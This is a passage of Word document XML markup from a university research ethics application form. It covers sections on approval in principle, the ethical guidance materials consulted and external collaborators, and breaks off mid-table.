    <w:p w14:paraId="72D619F3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION B: Approval for Research Activity</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10480" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="3693"/>
        <w:gridCol w:w="2539"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="851"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2CAC61B2" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1AAE6C27" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6232" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3077C4CC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Has the research activity received approval in principle?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC59B86" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>(please check the Guidance Notes as to the appropriate approval process for different levels of research by different categories of individual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20EC6695" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="1447122604"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="850" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="28282232" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26B49741" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="1244220297"/>
            <w14:checkbox>
              <w14:checked w14:val="1"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="851" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="791B7034" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="66B402F1" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C2CA53B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8075" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="07CBB1C9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2C702E7C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="539A0C72" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="437"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="22E1C4B9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3693" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A44B9A2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>If Yes, please indicate source of approval (and date where known):</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Approval in principle must be obtained from the relevant source prior to seeking ethical approval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4992602E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Research Degrees Committee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="706606798"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="850" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="0F80A6DF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="558E6A8A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="760216A8" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="415"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="57DC42DC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3693" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="37FDDCC5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="210B4C28" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Institute Research Committee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="1394927872"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="850" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="49756529" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37B6AC70" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="7F471759" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="492C204B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3693" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3CDFC16D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F0C46D1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Other (write in)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4505A00F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-1664075246"/>
            <w14:checkbox>
              <w14:checked w14:val="0"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="850" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="03DA3B17" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☐</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66199A73" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59AD51A7" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDE0AF7" w14:textId="038D2ABD" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION C:  Internal and External Ethical Guidance Materials</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10480" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="8784"/>
        <w:gridCol w:w="1134"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="0B02AC60" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="34579C45" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9918" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2012C455" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">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E42F41" w:rsidRPr="00E42F41" w14:paraId="14D67433" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009B9AE6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C92099F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink r:id="rId154" w:history="1">
              <w:r w:rsidR="00E42F41" w:rsidRPr="00E42F41">
                <w:t>UWTSD Research Ethics &amp; Integrity Code of Practice</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="39880F13" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="1578479508"/>
            <w14:checkbox>
              <w14:checked w14:val="1"/>
              <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
              <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
            </w14:checkbox>
          </w:sdtPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1134" w:type="dxa"/>
                <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
              </w:tcPr>
              <w:p w14:paraId="33B72A17" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="713C1921" w14:textId="77777777" w:rsidTr="00E42F41">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023472B7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31219413" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="703A5C37" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>UWTSD Research Data Management Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:id w:val="-2040961117"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="09F0AD7C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                  <w:rPr>
                    <w:i/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                    <w:i/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04F6797C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:lastRenderedPageBreak/>
        <w:t>SECTION D: External Collaborative Research Activity</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10480" w:type="dxa"/>
        <w:tblInd w:w="-289"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E42F41" w:rsidRPr="00E42F41" w14:paraId="043DDEF3" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E9F3C3F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6232" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3DD7318D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Does the research activity involve collaborators outside of the University?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0394C106" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1804497617"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
